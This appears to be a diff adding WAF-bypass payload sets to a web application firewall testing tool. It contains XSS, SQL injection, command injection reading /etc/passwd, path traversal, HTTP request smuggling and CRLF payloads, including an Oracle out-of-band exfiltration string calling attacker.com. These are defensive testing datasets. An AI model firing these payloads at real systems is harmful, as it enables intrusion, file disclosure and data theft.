@waftester/cli 2.8.0

package/payloads/community/waf-bypass/modsecurity-crs.json

@@ -0,0 +1,220 @@
+[
+  {
+    "id": "MODSEC-XSS-001",
+    "payload": "<scr<script>ipt>alert(1)</scr</script>ipt>",
+    "tags": ["modsecurity", "nested", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "ModSecurity double-tag bypass attempt - nested script tags",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-XSS-002",
+    "payload": "<svg/onload=alert(1)//",
+    "tags": ["modsecurity", "svg", "comment", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SVG with JS comment - sometimes bypasses tag detection",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-XSS-003",
+    "payload": "<img src=1 onerror  =alert(1)>",
+    "tags": ["modsecurity", "whitespace", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Extra whitespace before = in event handler",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-XSS-004",
+    "payload": "<img/src=1/onerror=alert(1)>",
+    "tags": ["modsecurity", "slash", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Slash instead of space as attribute separator",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-XSS-005",
+    "payload": "<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
+    "tags": ["modsecurity", "animate", "svg", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SVG animate tag - less commonly blocked",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-XSS-006",
+    "payload": "<svg><set onbegin=alert(1) attributeName=x to=1>",
+    "tags": ["modsecurity", "set", "svg", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SVG set tag with onbegin",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-XSS-007",
+    "payload": "<math><maction actiontype=statusline#http://google.com xlink:href=javascript:alert(1)>CLICKME",
+    "tags": ["modsecurity", "mathml", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "MathML bypass - rarely in CRS rules",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-SQL-001",
+    "payload": "1'--/**/",
+    "tags": ["modsecurity", "comment", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Mixed comment style bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-SQL-002",
+    "payload": "1'#/**/",
+    "tags": ["modsecurity", "hash-comment", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "MySQL hash comment with inline comment",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-SQL-003",
+    "payload": "1' OR '1'='1'/*",
+    "tags": ["modsecurity", "trailing-comment", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Trailing inline comment bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-SQL-004",
+    "payload": "1'/**/OR/**/1=1--",
+    "tags": ["modsecurity", "space-bypass", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Inline comments as space replacement",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-SQL-005",
+    "payload": "1'%00OR 1=1--",
+    "tags": ["modsecurity", "null-byte", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Null byte injection before keyword",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-RCE-001",
+    "payload": "| c'a't /etc/passwd",
+    "tags": ["modsecurity", "quote-break", "rce"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Quote insertion to break command detection",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-RCE-002",
+    "payload": "| c\"a\"t /etc/passwd",
+    "tags": ["modsecurity", "double-quote", "rce"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Double quote insertion bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-RCE-003",
+    "payload": "| c\\at /etc/passwd",
+    "tags": ["modsecurity", "backslash", "rce"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Backslash in command name",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-RCE-004",
+    "payload": "| $PATH:0:1}etc${PATH:0:1}passwd",
+    "tags": ["modsecurity", "variable-slice", "rce"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Variable slicing for slash character",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-RCE-005",
+    "payload": "| rev<<<'dwssap/cte/ tac'",
+    "tags": ["modsecurity", "reverse", "rce"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Reverse command bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-PATH-001",
+    "payload": "..././..././..././etc/passwd",
+    "tags": ["modsecurity", "traversal", "double"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Double dot-slash to survive strip",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-PATH-002",
+    "payload": "....//....//....//etc/passwd",
+    "tags": ["modsecurity", "traversal", "multi-slash"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Multiple dots with double slash",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-PATH-003",
+    "payload": "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd",
+    "tags": ["modsecurity", "traversal", "double-encode"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Double URL encoded path traversal",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-PATH-004",
+    "payload": "%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd",
+    "tags": ["modsecurity", "traversal", "overlong-utf8"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Overlong UTF-8 encoding bypass",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "MODSEC-PATH-005",
+    "payload": "..%00/..%00/..%00/etc/passwd",
+    "tags": ["modsecurity", "traversal", "null-byte"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Null bytes in path traversal",
+    "category": "WAF-Bypass"
+  },
+  {
+    "id": "CRS-BYPASS-001",
+    "payload": "JavaScript://%250Aalert?.(1)//'/*\\'/*\"/*\\\"/*`/*\\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\\76-->",
+    "tags": ["crs", "polyglot", "ultimate", "xss"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Ultimate XSS polyglot from PayloadsAllTheThings - tests many contexts",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "CRS-BYPASS-002",
+    "payload": "SLEEP(1) /*' or SLEEP(1) or '\" or SLEEP(1) or \"*/",
+    "tags": ["crs", "polyglot", "timing", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SQL timing polyglot - works across quote contexts",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  }
+]

package/payloads/community/waf-bypass/protocol-attacks.json

@@ -0,0 +1,101 @@
+[
+  {
+    "id": "SMUG-CLTE-001",
+    "payload": "POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGPOST /admin",
+    "category": "Protocol",
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "tags": ["smuggling", "cl-te", "desync"],
+    "notes": "CL.TE request smuggling - frontend uses CL, backend uses TE"
+  },
+  {
+    "id": "SMUG-CLTE-002",
+    "payload": "POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nX",
+    "category": "Protocol",
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "tags": ["smuggling", "cl-te"],
+    "notes": "Minimal CL.TE smuggling probe for desync detection"
+  },
+  {
+    "id": "SMUG-TECL-001",
+    "payload": "POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 3\r\nTransfer-Encoding: chunked\r\n\r\n8\r\nSMUGGLED\r\n0\r\n\r\n",
+    "category": "Protocol",
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "tags": ["smuggling", "te-cl", "desync"],
+    "notes": "TE.CL request smuggling - frontend uses TE, backend uses CL"
+  },
+  {
+    "id": "SMUG-TETE-001",
+    "payload": "POST / HTTP/1.1\r\nHost: target.com\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: identity\r\n\r\n5\r\nHello\r\n0\r\n\r\n",
+    "category": "Protocol",
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "tags": ["smuggling", "te-te"],
+    "notes": "TE.TE with duplicate headers - different server interpretations"
+  },
+  {
+    "id": "HEADER-INJECT-001",
+    "payload": "X-Forwarded-For: 127.0.0.1\r\nX-Real-IP: 127.0.0.1",
+    "category": "Protocol",
+    "expected_block": true,
+    "severity_hint": "High",
+    "tags": ["header", "ip-spoofing"],
+    "notes": "IP spoofing via X-Forwarded-For"
+  },
+  {
+    "id": "HEADER-INJECT-002",
+    "payload": "X-Forwarded-Host: evil.com",
+    "category": "Protocol",
+    "expected_block": true,
+    "severity_hint": "High",
+    "tags": ["header", "host-header"],
+    "notes": "Host header injection for cache poisoning and password reset attacks"
+  },
+  {
+    "id": "PROTO-CRLF-001",
+    "payload": "value%0d%0aX-Injected: malicious",
+    "category": "Protocol",
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "tags": ["crlf", "header-injection"],
+    "notes": "CRLF injection to inject arbitrary HTTP headers"
+  },
+  {
+    "id": "WS-UPGRADE-001",
+    "payload": "GET /ws HTTP/1.1\r\nUpgrade: websocket\r\nConnection: Upgrade\r\nSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==",
+    "category": "Protocol",
+    "expected_block": false,
+    "severity_hint": "Medium",
+    "tags": ["websocket", "upgrade"],
+    "notes": "Legitimate WebSocket upgrade - test WAF handling"
+  },
+  {
+    "id": "WS-SMUGGLE-001",
+    "payload": "GET /socket HTTP/1.1\r\nUpgrade: websocket\r\nConnection: keep-alive, Upgrade",
+    "category": "Protocol",
+    "expected_block": true,
+    "severity_hint": "High",
+    "tags": ["websocket", "smuggling"],
+    "notes": "WebSocket connection smuggling attempt"
+  },
+  {
+    "id": "METHOD-OVERRIDE-001",
+    "payload": "X-HTTP-Method-Override: DELETE",
+    "category": "Protocol",
+    "expected_block": true,
+    "severity_hint": "High",
+    "tags": ["method-override", "header"],
+    "notes": "HTTP method override via X-HTTP-Method-Override header to bypass access controls"
+  },
+  {
+    "id": "METHOD-OVERRIDE-002",
+    "payload": "_method=DELETE",
+    "category": "Protocol",
+    "expected_block": true,
+    "severity_hint": "High",
+    "tags": ["method-override", "parameter"],
+    "notes": "Rails/Laravel-style _method parameter to override HTTP verb"
+  }
+]

package/payloads/community/waf-bypass/sqlmap-tamper.json

@@ -0,0 +1,252 @@
+[
+  {
+    "id": "TAMP-SQL-001",
+    "payload": "1'%09AND%091=1--",
+    "tags": ["tamper", "whitespace", "tab", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SQLmap space2tab - replaces spaces with tabs",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-002",
+    "payload": "1'%0AAND%0A1=1--",
+    "tags": ["tamper", "whitespace", "newline", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SQLmap space2newline - replaces spaces with newlines",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-003",
+    "payload": "1'%0BAND%0B1=1--",
+    "tags": ["tamper", "whitespace", "vertical-tab", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Vertical tab as whitespace bypass",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-004",
+    "payload": "1'%0CAND%0C1=1--",
+    "tags": ["tamper", "whitespace", "form-feed", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Form feed as whitespace bypass",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-005",
+    "payload": "1'%0DAND%0D1=1--",
+    "tags": ["tamper", "whitespace", "carriage-return", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Carriage return as whitespace bypass",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-006",
+    "payload": "1'%A0AND%A01=1--",
+    "tags": ["tamper", "whitespace", "nbsp", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Non-breaking space as whitespace bypass",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-007",
+    "payload": "1'/**/AND/**/1=1--",
+    "tags": ["tamper", "comment", "inline", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SQLmap space2comment - replaces spaces with inline comments",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-008",
+    "payload": "1'/*random*/AND/*text*/1=1--",
+    "tags": ["tamper", "comment", "random", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SQLmap randomcomments - random text in comments",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-009",
+    "payload": "1'/*!12345AND*/1=1--",
+    "tags": ["tamper", "comment", "conditional", "mysql", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "MySQL conditional comment bypass (version >= 1.2.3.45)",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "TAMP-SQL-010",
+    "payload": "1'/*!50000AND*/1=1--",
+    "tags": ["tamper", "comment", "conditional", "mysql", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "MySQL 5.0+ conditional comment bypass",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "TAMP-SQL-011",
+    "payload": "(1)and(1)=(1)--",
+    "tags": ["tamper", "parenthesis", "no-space", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Parenthesis bypass - no spaces needed",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "TAMP-SQL-012",
+    "payload": "1'%252f%252a*/AND%252f%252a*/1=1--",
+    "tags": ["tamper", "double-encode", "comment", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Double URL encoding of comment markers",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-013",
+    "payload": "%53%45%4C%45%43%54 1",
+    "tags": ["tamper", "url-encode", "full", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SQLmap charencode - full URL encoding of SELECT",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-014",
+    "payload": "%u0053%u0045%u004C%u0045%u0043%u0054 1",
+    "tags": ["tamper", "unicode-encode", "iis", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SQLmap charunicodeescape - IIS Unicode encoding",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-015",
+    "payload": "1' AnD 1=1--",
+    "tags": ["tamper", "case", "random", "sqli"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "SQLmap randomcase - mixed case keywords",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-016",
+    "payload": "1' %00AND 1=1--",
+    "tags": ["tamper", "null-byte", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Null byte insertion between keywords",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-017",
+    "payload": "CONCAT(CHAR(83),CHAR(69),CHAR(76),CHAR(69),CHAR(67),CHAR(84)) 1",
+    "tags": ["tamper", "char", "obfuscation", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "CHAR() function to spell keywords",
+    "category": "WAF-Bypass",
+    "source": "SQLmap/tamper"
+  },
+  {
+    "id": "TAMP-SQL-018",
+    "payload": "1'||UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT banner FROM v$version WHERE ROWNUM=1))--",
+    "tags": ["tamper", "oracle", "oob", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Oracle out-of-band data exfiltration",
+    "category": "WAF-Bypass",
+    "source": "SecLists"
+  },
+  {
+    "id": "TAMP-SQL-019",
+    "payload": "1.e(ascii(1.e(substring(1.e(select user())1.e,1 1.e,1 1.e)1.e)1.e) = 70",
+    "tags": ["tamper", "scientific-notation", "mysql", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "MySQL scientific notation obfuscation",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "TAMP-SQL-020",
+    "payload": "1' AND 1 LIKE 1--",
+    "tags": ["tamper", "like", "equal-bypass", "sqli"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "LIKE instead of = for equal bypass",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "TAMP-SQL-021",
+    "payload": "1' AND 1 REGEXP 1--",
+    "tags": ["tamper", "regexp", "equal-bypass", "sqli"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "REGEXP instead of = for equal bypass",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "TAMP-SQL-022",
+    "payload": "1' AND 1 BETWEEN 0 AND 2--",
+    "tags": ["tamper", "between", "equal-bypass", "sqli"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "BETWEEN instead of = for equal bypass",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "TAMP-SQL-023",
+    "payload": "1' && 1--",
+    "tags": ["tamper", "operator", "and-bypass", "sqli"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "&& instead of AND",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "TAMP-SQL-024",
+    "payload": "1' || 1--",
+    "tags": ["tamper", "operator", "or-bypass", "sqli"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "|| instead of OR",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  },
+  {
+    "id": "TAMP-SQL-025",
+    "payload": "LIMIT 1 OFFSET 0",
+    "tags": ["tamper", "limit", "comma-bypass", "sqli"],
+    "expected_block": true,
+    "severity_hint": "Medium",
+    "notes": "OFFSET instead of comma in LIMIT clause",
+    "category": "WAF-Bypass",
+    "source": "PayloadsAllTheThings"
+  }
+]